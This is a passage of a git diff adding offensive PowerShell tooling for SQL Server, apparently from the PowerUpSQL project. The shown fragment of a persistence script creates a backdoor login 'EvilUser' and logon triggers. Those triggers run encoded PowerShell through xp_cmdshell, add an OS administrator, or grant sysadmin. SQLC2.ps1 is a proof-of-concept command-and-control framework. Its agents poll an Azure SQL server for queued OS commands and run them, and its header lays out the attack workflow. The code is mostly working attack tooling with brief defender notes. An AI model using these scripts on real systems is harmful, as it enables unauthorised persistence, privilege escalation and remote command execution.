query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + + # ------------------------------------------------------- + # Check if the service account is local admin + # ------------------------------------------------------- + + Write-Host "[*] Checking if service account is a local administrator..." + + # Open db connection + $conn.Open() + + # Setup query + $Query = @" + + -- Setup reg path + DECLARE @SQLServerInstance varchar(250) + if @@SERVICENAME = 'MSSQLSERVER' + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' + END + ELSE + BEGIN + set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) + END + + -- Grab service account from service's reg path + DECLARE @ServiceaccountName varchar(250) + EXECUTE master.dbo.xp_instance_regread + N'HKEY_LOCAL_MACHINE', @SQLServerInstance, + N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' + + DECLARE @MachineType SYSNAME + EXECUTE master.dbo.xp_regread + @rootkey = N'HKEY_LOCAL_MACHINE', + @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', + @value_name = N'ProductType', + @value = @MachineType output + + -- Grab more info about the server + SELECT @ServiceAccountName as SvcAcct +"@ + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Parse query results + $TableServiceAccount = New-Object System.Data.DataTable + $TableServiceAccount.Load($results) + $SqlServeServiceAccountDirty = $TableServiceAccount | select SvcAcct -ExpandProperty SvcAcct + $SqlServeServiceAccount = $SqlServeServiceAccountDirty -replace '\.\\','' + + # Close db connection + $conn.Close() + + # Open db connection + $conn.Open() + + # Setup query + $Query = "EXEC master..xp_cmdshell 'net localgroup Administrators';" + + # Execute query + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Parse query results + $TableServiceAccountPriv = New-Object System.Data.DataTable + $TableServiceAccountPriv.Load($results) + + # Close db connection + $conn.Close() + + if($SqlServeServiceAccount -eq "LocalSystem" -or $TableServiceAccountPriv -contains "$SqlServeServiceAccount"){ + Write-Host "[*] The service account $SqlServeServiceAccount has local administrator privileges." + $SvcAdmin = 1 + }else{ + Write-Host "[*] The service account $SqlServeServiceAccount does NOT have local administrator privileges." + $SvcAdmin = 0 + } + + # ------------------------------------------------------- + # Add User for Logon triggers + # ------------------------------------------------------- + if(($NewSqlUser) -or ($PsCommand) -or ($NewOsUser)){ + + # Status user + Write-Host "[*] Adding EvilUser with password Password123! to be used with logon trigger..." + + # Create query + $Query = "IF NOT EXISTS (SELECT * FROM sys.syslogins WHERE name = 'EvilUser') + exec('CREATE LOGIN [EvilUser] WITH PASSWORD = ''Password123!''')" + + # Open db connection + $conn.Open() + + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + Write-Host "[*] The EvilUser has been added with password Password123! to use with logon trigger." -foreground "green" + } + + # ------------------- + # Setup the pscommand + # ------------------- + $Query_PsCommand = "" + if($PsCommand){ + + # Status user + Write-Host "[*] Creating encoding PowerShell payload..." -foreground "green" + + # Check for local administrator privs + if($SvcAdmin -eq 0){ + Write-Host "[*] Note: PowerShell won't be able to take administrative actions due to the service account configuration." -foreground "green" + } + + # This encoding method was based on a function by Carlos Perez + # https://raw.githubusercontent.com/darkoperator/Posh-SecMod/master/PostExploitation/PostExploitation.psm1 + + # Encode PowerShell command + $CmdBytes = [Text.Encoding]::Unicode.GetBytes($PsCommand) + $EncodedCommand = [Convert]::ToBase64String($CmdBytes) + + # Check if PowerShell command is too long + If ($EncodedCommand.Length -gt 8100) + { + Write-Host "PowerShell encoded payload is too long so the PowerShell command will not be added." -foreground "red" + }else{ + + # Create query + $Query_PsCommand = "EXEC master..xp_cmdshell ''PowerShell -enc $EncodedCommand'';" + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF EXISTS (SELECT * FROM sys.server_triggers WHERE name = 'evil_logon_trigger_pscmd') + DROP TRIGGER [evil_logon_trigger_pscmd] ON ALL SERVER + exec('CREATE Trigger [evil_logon_trigger_pscmd] + on ALL Server + For LOGON WITH EXECUTE AS ''sa'' + AS + IF ORIGINAL_LOGIN() = ''EvilUser'' + $Query_PsCommand; + END')" + + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + Write-Host "[*] Payload generated." -foreground "green" + } + }else{ + Write-Host "[*] Note: No PowerShell will be executed, because the parameters weren't provided." + } + + # ------------------- + # Setup newosuser + # ------------------- + $Query_OsAddUser = "" + if($NewOsUser){ + + # Status user + Write-Host "[*] Creating payload to add OS user..." -foreground "green" + + # Check for local administrator privs + if($SvcAdmin -eq 0){ + + # Status user + Write-Host "[*] No OS admin will be created, because the service account does not have local administrator privileges." + }else{ + + # Create query + $Query_OsAddUser = "EXEC master..xp_cmdshell ''net user $NewOsUser $NewOsPass /add & net localgroup administrators /add $NewOsUser'';" + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF EXISTS (SELECT * FROM sys.server_triggers WHERE name = 'evil_logon_trigger_addosadmin') + DROP TRIGGER [evil_logon_trigger_addosadmin] ON ALL SERVER + exec('CREATE Trigger [evil_logon_trigger_addosadmin] + on ALL Server WITH EXECUTE AS ''sa'' + For LOGON + AS + IF ORIGINAL_LOGIN() = ''EvilUser'' + $Query_OsAddUser; + END')" + + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + # Status user + Write-Host "[*] Payload generated." -foreground "green" + } + }else{ + Write-Host "[*] Note: No OS admin will be created, because the parameters weren't provided." + } + + # ----------------------------------------- + # Create logon trigger to add sysadmin + # ----------------------------------------- + $Query_SysAdmin = "" + if($NewSqlUser){ + + # Status user + Write-Host "[*] Generating payload to add sysadmin..." -foreground "green" + + # Create query + $Query_SysAdmin = "IF NOT EXISTS (SELECT * FROM sys.syslogins WHERE name = ''$NewSqlUser'') + exec(''CREATE LOGIN [$NewSqlUser] WITH PASSWORD = ''''$NewSqlPass'''';EXEC sp_addsrvrolemember ''''$NewSqlUser'''', ''''sysadmin'''';'')" + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF EXISTS (SELECT * FROM sys.server_triggers WHERE name = 'evil_logon_trigger_addsysadmin') + DROP TRIGGER [evil_logon_trigger_addsysadmin] ON ALL SERVER + exec('CREATE Trigger [evil_logon_trigger_addsysadmin] + on ALL Server WITH EXECUTE AS ''sa'' + For LOGON + AS + BEGIN + IF ORIGINAL_LOGIN() = ''EvilUser'' + $Query_SysAdmin; + END')" + + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + # Status user + Write-Host "[*] Payload generated." -foreground "green" + }else{ + Write-Host "[*] Note: No sysadmin will be created, because the parameters weren't provided." + Break + } + + + + # ------------------------------------------------------- + # Remove Logon triggers + # ------------------------------------------------------- + if($Remove){ + + # Status user + Write-Host "[*] Removing trigger named evil_DDL_trigger..." + + # --------------------------- + # Create procedure + # --------------------------- + + # Open db connection + $conn.Open() + + # Setup query + $Query = "IF EXISTS (SELECT * FROM sys.server_triggers WHERE name = 'evil_logon_trigger') + DROP TRIGGER [evil_logon_trigger_addsysadmin] ON ALL SERVER; + DROP TRIGGER [evil_logon_trigger_addosadmin] ON ALL SERVER; + DROP TRIGGER [evil_logon_trigger_pscmd] ON ALL SERVER; + DROP LOGIN [EvilUser];" + + $cmd = New-Object System.Data.SqlClient.SqlCommand($Query,$conn) + $results = $cmd.ExecuteReader() + + # Close db connection + $conn.Close() + + Write-Host "[*] The evil_logon_trigger trigger has been been removed." -foreground "green" + } + + Write-Host "[*] All done." +} + diff --git a/scripts/pending/LinkConvertExample.ps1 b/scripts/pending/LinkConvertExample.ps1 new file mode 100644 index 0000000..6600cea --- /dev/null +++ b/scripts/pending/LinkConvertExample.ps1 @@ -0,0 +1,32 @@ +$output = Get-SQLServerLinkCrawl -Verbose -Username sa -Password 'SuperSecretPassword!' -Instance 'MSSQLSRV04.demo.local\SQLSERVER2014' +$CsvResults = $output | +foreach { + [string]$StringLinkPath = "" + $Path = $_.path + $PathCount = $Path.count - 1 + $LinkSrc = $Path[$PathCount - 1] + $LinkDes = $Path[$PathCount] + $LinkUser = $_.user + $LinkDesSysadmin = $_.Sysadmin + $Instance = $_.instance + $LinkDesVersion = $_.Version + $Path | + foreach { + if ( $StringLinkPath -eq ""){ + [string]$StringLinkPath = "$_" + }else{ + [string]$StringLinkPath = "$StringLinkPath -> $_" + } + } + $Object = New-Object PSObject + $Object | add-member Noteproperty LinkSrc $LinkSrc + $Object | add-member Noteproperty LinkName $LinkDes + $Object | add-member Noteproperty LinkInstance $Instance + $Object | add-member Noteproperty LinkUser $LinkUser + $Object | add-member Noteproperty LinkSysadmin $LinkDesSysadmin + $Object | add-member Noteproperty LinkVersion $LinkDesVersion + $Object | add-member Noteproperty LinkHops $PathCount + $Object | add-member Noteproperty LinkPath $StringLinkPath + $Object +} +$CsvResults | export-csv -NoTypeInformation SQL-Server-Links.csv diff --git a/scripts/pending/README.md b/scripts/pending/README.md new file mode 100644 index 0000000..0dda9d0 --- /dev/null +++ b/scripts/pending/README.md @@ -0,0 +1,23 @@ + ### Stand Alone Scripts + These are scripts that will eventually be turned into PowerUpSQL functions. + + Author: Scott Sutherland + Get-SQLCompactQuery.ps1 + + Author: Scott Sutherland + Get-SQLServiceAccountPwHashes.ps1 + + Author: Scott Sutherland + Invoke-SqlServer-Persist-StartupSp.psm1 + + Author: Scott Sutherland + Invoke-SqlServer-Persist-TriggerLogon.psm1 + + Author: Antti Rantasaari + Get-MSSQLCredentialPasswords.psm1 + + Author: Scott Sutherland + Invoke-HuntSQLServers.ps1 + + Author: Scott Sutherland + SQLC2.ps1 diff --git a/scripts/pending/SQLC2.ps1 b/scripts/pending/SQLC2.ps1 new file mode 100644 index 0000000..957f30c --- /dev/null +++ b/scripts/pending/SQLC2.ps1 @@ -0,0 +1,2833 @@ +<# + Script: SQLC2.ps1 + Description: This is a basic PoC script that contains functions that can be + used to install and manage a C2 via a SQL Server instance. + The C2 SQL Server is intended to be hosted remotely or in Azure + via a database.windows.net address. The client functions can be + run by a schedule task or other means for periodic check in + and command grabbing from the C2 SQL Server. + Author: Scott Sutherland (@_nullbind), NetSPI 2018 + License: BSD 3-Clause + Mini Guide: + + ---------------------------- + Azure Configuration Overview + ---------------------------- + + 1. Create an Azure account and log in. + + 3. Create a SQL server databse. In this example the server will be named sqlcloudc2 and the datatabase will be named database1. + + 4. Add a virtual firewall exception for the target networks that you will be receiving connections from. + + ---------------------------- + Attack Workflow Overview + ---------------------------- + 1. Install SQLC2. + + Install C2 tables in remote SQL Server instance. You will need to provide an database that you have the ability to create tables in, or create a new at database. However, in Azure I've been getting some timeouts which is why you should have already created the target database through Azure. + + Example command: + Install-SQLC2Server -Username CloudAdmin -Password 'CloudPassword!' -Instance sqlcloudc2.database.windows.net -Database database1 -Verbose + + 2. Setup OS command. + + Set a OS command to run on all agent systems. You can also configure commands to run on a specific agent using the -ServerName paremeter. + + Example command: + Set-SQLC2Command -Username CloudAdmin -Password 'CloudPassword!' -Instance sqlcloudc2.database.windows.net -Database database1 -Verbose -Command "Whoami" + + 3. List queued commands. + + The command below will query the SQLC2 server for a list of commands queued for the agent to execute. This will only output the commands, it will not execute them. + + Example command: + Get-SQLC2Command -Username CloudAdmin -Password 'CloudPassword!' -Instance sqlcloudc2.database.windows.net -Database database1 -Verbose + + 4. The agent will automatically be registered. To list the registered agent use the command below. + + Get-SQLC2Agent -Username CloudAdmin -Password 'CloudPassword!' -Instance sqlcloudc2.database.windows.net -Database database1 -Verbose + + 5. Execute queued commands via PS. This can be scheduled via a WMI subscription or schedule task. + + The command below will query the SQLC2 server for a list of commands queued for the agent to execute. Including the -Execute flag will automatically run them. This command could be used in combination with your prefered persistence method such as a scheduled task. + + Example command: + Get-SQLC2Command -Verbose -Username CloudAdmin -Password 'CloudPassword!' -Instance sqlcloudc2.database.windows.net -Database database1 -Execute + + 5a. Execute queued commands via SQL Server link and agent job. This allows you to use an internal SQL Server as your agent. This requires sysadmin privileges on the internal SQL Server. + + Install-SQLC2AgentLink -Instance 'InternalSQLServer1\SQLSERVER2014' -C2Username 'CloudAdmin' -C2Password 'CloudPassword!' -C2Instance sqlcloudc2.database.windows.net -C2Database database1 -Verbose + + Note: You can use the command below to remove the server link agent. + + Uninstall-SQLC2AgentLink -Verbose -Instance 'InternalSQLServer1\SQLSERVER2014' + + 5b. Execute queued commands via a schedule task or other persistence method. This allows you to the local OS as an agent. This requires local administrative privileges. + + Install-SQLC2AgentPs -Verbose -Instance 'InternalSQLServer1\SQLSERVER2014' -Username CloudAdmin -Password 'CloudPassword!' -Instance sqlcloudc2.database.windows.net -Database database1 + + Note: You can use the command below to remove the installed agent. + + Uninstall-SQLC2AgentPs -Verbose + + 6. View command results. + + The command below can be used to retrieve the command results. By default it shows the entire command history. However, results can be filtered by -Status, -ServerName, and -Cid. + + Example command: + Get-SQLC2Result -Username CloudAdmin -Password 'CloudPassword!' -Instance sqlcloudc2.database.windows.net -Database database1 -Verbose -Status 'success' + + ---------------------------- + Blue Team Datasource Notes + ---------------------------- + 1. PowerShell logging. + 2. EDR showing PowerShell connecting to the internet. Specifically, *.database.windows.net (Azure) + 3. EDR showing specific commands being executed such as "Get-SQLC2Comand". +#> + + +# ---------------------------------- +# Get-SQLC2ConnectionObject +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLC2ConnectionObject +{ + <# + .SYNOPSIS + Creates a object for connecting to SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Database + Default database to connect to. + .PARAMETER AppName + Spoof the name of the application you are connecting to SQL Server with. + .PARAMETER Encrypt + Use an encrypted connection. + .PARAMETER TrustServerCert + Trust the certificate of the remote server. + .EXAMPLE + PS C:\> Get-SQLC2ConnectionObject -Username myuser -Password mypass -Instance server1 -Encrypt Yes -TrustServerCert Yes -AppName "myapp" + StatisticsEnabled : False + AccessToken : + ConnectionString : Server=server1;Database=Master;User ID=myuser;Password=mypass;Connection Timeout=1 ;Application + Name="myapp";Encrypt=Yes;TrustServerCertificate=Yes + ConnectionTimeout : 1 + Database : Master + DataSource : server1 + PacketSize : 8000 + ClientConnectionId : 00000000-0000-0000-0000-000000000000 + ServerVersion : + State : Closed + WorkstationId : Workstation1 + Credential : + FireInfoMessageEventOnUserErrors : False + Site : + Container : + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Dedicated Administrator Connection (DAC).')] + [Switch]$DAC, + + [Parameter(Mandatory = $false, + HelpMessage = 'Default database to connect to.')] + [String]$Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the application your connecting to the server with.')] + [string]$AppName = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Use an encrypted connection.')] + [ValidateSet("Yes","No","")] + [string]$Encrypt = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Trust the certificate of the remote server.')] + [ValidateSet("Yes","No","")] + [string]$TrustServerCert = "", + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut = 1 + ) + + Begin + { + # Setup DAC string + if($DAC) + { + $DacConn = 'ADMIN:' + } + else + { + $DacConn = '' + } + + # Set database filter + if(-not $Database) + { + $Database = 'Master' + } + + # Check if appname was provided + if($AppName){ + $AppNameString = ";Application Name=`"$AppName`"" + }else{ + $AppNameString = "" + } + + # Check if encrypt was provided + if($Encrypt){ + $EncryptString = ";Encrypt=Yes" + }else{ + $EncryptString = "" + } + + # Check TrustServerCert was provided + if($TrustServerCert){ + $TrustCertString = ";TrustServerCertificate=Yes" + }else{ + $TrustCertString = "" + } + } + + Process + { + # Check for instance + if ( -not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Create connection object + $Connection = New-Object -TypeName System.Data.SqlClient.SqlConnection + + # Set authentcation type - current windows user + if(-not $Username){ + + # Set authentication type + $AuthenticationType = "Current Windows Credentials" + + # Set connection string + $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;Connection Timeout=1 $AppNameString $EncryptString $TrustCertString" + } + + # Set authentcation type - provided windows user + if ($username -like "*\*"){ + $AuthenticationType = "Provided Windows Credentials" + + # Setup connection string + $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;uid=$Username;pwd=$Password;Connection Timeout=$TimeOut$AppNameString$EncryptString$TrustCertString" + } + + # Set authentcation type - provided sql login + if (($username) -and ($username -notlike "*\*")){ + + # Set authentication type + $AuthenticationType = "Provided SQL Login" + + # Setup connection string + $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;User ID=$Username;Password=$Password;Connection Timeout=$TimeOut $AppNameString$EncryptString$TrustCertString" + } + + # Return the connection object + return $Connection + } + + End + { + } +} + + +# ---------------------------------- +# Get-SQLC2Query +# ---------------------------------- +# Author: Scott Sutherland +Function Get-SQLC2Query +{ + <# + .SYNOPSIS + Executes a query on target SQL servers. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER Database + Default database to connect to. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .PARAMETER Threads + Number of concurrent threads. + .PARAMETER Query + Query to be executed on the SQL Server. + .PARAMETER AppName + Spoof the name of the application you are connecting to SQL Server with. + .PARAMETER Encrypt + Use an encrypted connection. + .PARAMETER TrustServerCert + Trust the certificate of the remote server. + .EXAMPLE + PS C:\> Get-SQLC2Query -Verbose -Instance "SQLSERVER1.domain.com\SQLExpress" -Query "Select @@version" -Threads 15 + .EXAMPLE + PS C:\> Get-SQLC2Query -Verbose -Instance "SQLSERVER1.domain.com,1433" -Query "Select @@version" -Threads 15 + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLC2Query -Verbose -Query "Select @@version" -Threads 15 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server query.')] + [string]$Query, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, + + [Parameter(Mandatory = $false, + HelpMessage = 'Default database to connect to.')] + [String]$Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [int]$TimeOut, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose, + + [Parameter(Mandatory = $false, + HelpMessage = 'Spoof the name of the application your connecting to the server with.')] + [string]$AppName = "Microsoft SQL Server Management Studio - Query", + + [Parameter(Mandatory = $false, + HelpMessage = 'Use an encrypted connection.')] + [ValidateSet("Yes","No","")] + [string]$Encrypt = "Yes", + + [Parameter(Mandatory = $false, + HelpMessage = 'Trust the certificate of the remote server.')] + [ValidateSet("Yes","No","")] + [string]$TrustServerCert = "Yes", + + [Parameter(Mandatory = $false, + HelpMessage = 'Return error message if exists.')] + [switch]$ReturnError + ) + + Begin + { + # Setup up data tables for output + $TblQueryResults = New-Object -TypeName System.Data.DataTable + } + + Process + { + # Setup DAC string + if($DAC) + { + # Create connection object + $Connection = Get-SQLC2ConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -DAC -Database $Database -AppName $AppName -Encrypt $Encrypt -TrustServerCert $TrustServerCert + } + else + { + # Create connection object + $Connection = Get-SQLC2ConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database -AppName $AppName -Encrypt $Encrypt -TrustServerCert $TrustServerCert + } + + # Parse SQL Server instance name + $ConnectionString = $Connection.Connectionstring + $Instance = $ConnectionString.split(';')[0].split('=')[1] + + # Check for query + if($Query) + { + # Attempt connection + try + { + # Open connection + $Connection.Open() + + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + + # Setup SQL query + $Command = New-Object -TypeName System.Data.SqlClient.SqlCommand -ArgumentList ($Query, $Connection) + + # Grab results + $Results = $Command.ExecuteReader() + + # Load results into data table + $TblQueryResults.Load($Results) + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed - for detail error use Get-SQLC2ConnectionTest + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + + if($ReturnError) + { + $ErrorMessage = $_.Exception.Message + #Write-Verbose " Error: $ErrorMessage" + } + } + } + else + { + Write-Output -InputObject 'No query provided to Get-SQLC2Query function.' + Break + } + } + + End + { + # Return Results + if($ReturnError) + { + $ErrorMessage + } + else + { + $TblQueryResults + } + } +} + + +# ---------------------------------- +# Get-SQLC2ConnectionTest +# ---------------------------------- +Function Get-SQLC2ConnectionTest +{ + <# + .SYNOPSIS + Tests if the current Windows account or provided SQL Server login can log into an SQL Server. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER Database + Default database to connect to. + .PARAMETER TimeOut + Connection time out. + .PARAMETER SuppressVerbose + Suppress verbose errors. Used when function is wrapped. + .EXAMPLE + PS C:\> Get-SQLC2ConnectionTest -Verbose -Instance "SQLSERVER1.domain.com\SQLExpress" + .EXAMPLE + PS C:\> Get-SQLC2ConnectionTest -Verbose -Instance "SQLSERVER1.domain.com,1433" + .EXAMPLE + PS C:\> Get-SQLInstanceDomain | Get-SQLC2ConnectionTest -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connect using Dedicated Admin Connection.')] + [Switch]$DAC, + + [Parameter(Mandatory = $false, + HelpMessage = 'Default database to connect to.')] + [String]$Database, + + [Parameter(Mandatory = $false, + HelpMessage = 'Connection timeout.')] + [string]$TimeOut, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Setup data table for output + $TblResults = New-Object -TypeName System.Data.DataTable + $null = $TblResults.Columns.Add('ComputerName') + $null = $TblResults.Columns.Add('Instance') + $null = $TblResults.Columns.Add('Status') + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Setup DAC string + if($DAC) + { + # Create connection object + $Connection = Get-SQLC2ConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut -Database $Database + } + else + { + # Create connection object + $Connection = Get-SQLC2ConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database + } + + # Attempt connection + try + { + # Open connection + $Connection.Open() + + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Accessible') + + # Close connection + $Connection.Close() + + # Dispose connection + $Connection.Dispose() + } + catch + { + # Connection failed + if(-not $SuppressVerbose) + { + $ErrorMessage = $_.Exception.Message + Write-Verbose -Message "$Instance : Connection Failed." + Write-Verbose -Message " Error: $ErrorMessage" + } + + # Add record + $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') + } + } + + End + { + # Return Results + $TblResults + } +} + + +# ------------------------------------------- +# Function: Get-SQLC2ComputerNameFromInstance +# ------------------------------------------ +# Author: Scott Sutherland +Function Get-SQLC2ComputerNameFromInstance +{ + <# + .SYNOPSIS + Parses computer name from a provided instance. + .PARAMETER Instance + SQL Server instance to parse. + .EXAMPLE + PS C:\> Get-SQLC2ComputerNameFromInstance -Instance SQLServer1\STANDARDDEV2014 + SQLServer1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance.')] + [string]$Instance + ) + + # Parse ComputerName from provided instance + If ($Instance) + { + $ComputerName = $Instance.split('\')[0].split(',')[0] + } + else + { + $ComputerName = $env:COMPUTERNAME + } + + Return $ComputerName +} + + +# ---------------------------------- +# Install-SQLC2Server +# ---------------------------------- +# Author: Scott Sutherland +Function Install-SQLC2Server +{ + <# + .SYNOPSIS + This functions creates the C2 SQL Server tables in the target database. + If the database does not exist, the script will try to create it. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Connect using Dedicated Admin Connection. + .PARAMETER DatabaseName + Database name that contains target table. + .EXAMPLE + PS C:\> Install-SQLC2Server -Instance "SQLServer1\STANDARDDEV2014" -Database database1 + PS C:\> Install-SQLC2Server -Username CloudAdmin -Password 'CloudPassword!' -Instance cloudserver1.database.windows.net -Database database1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate with.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate with.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Database containing target C2 table.')] + [string]$Database, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'ServerName of the agent.')] + [string]$ServerName, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Command to run on the agent.')] + [string]$Command, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # Create data tables for output + $TblResults = New-Object -TypeName System.Data.DataTable + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-SQLC2ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Test connection to instance + $TestConnection = Get-SQLC2ConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { + $_.Status -eq 'Accessible' + } + + # Test connection + if($TestConnection) + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Success." + } + } + else + { + if( -not $SuppressVerbose) + { + Write-Verbose -Message "$Instance : Connection Failed." + } + return + } + + Write-Verbose "$instance : Note: Creating DBs on thefly in Azure times out sometimes." + Write-Verbose "$instance : Attempting to verify and/or create the database $Database..." + + # Create Database Query + $Query = " + If not Exists (SELECT name FROM master.dbo.sysdatabases WHERE name = '$Database') + CREATE DATABASE db1 + ELSE + SELECT name FROM master..sysdatabases WHERE name like '$Database'" + + # Create Database results + $TblResults = Get-SQLC2Query -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -Database 'master' -SuppressVerbose -TimeOut 300 + $RowCount = $TblResults | Measure-Object | select Count -ExpandProperty count + if($RowCount -eq 1) + { + Write-Verbose "$instance 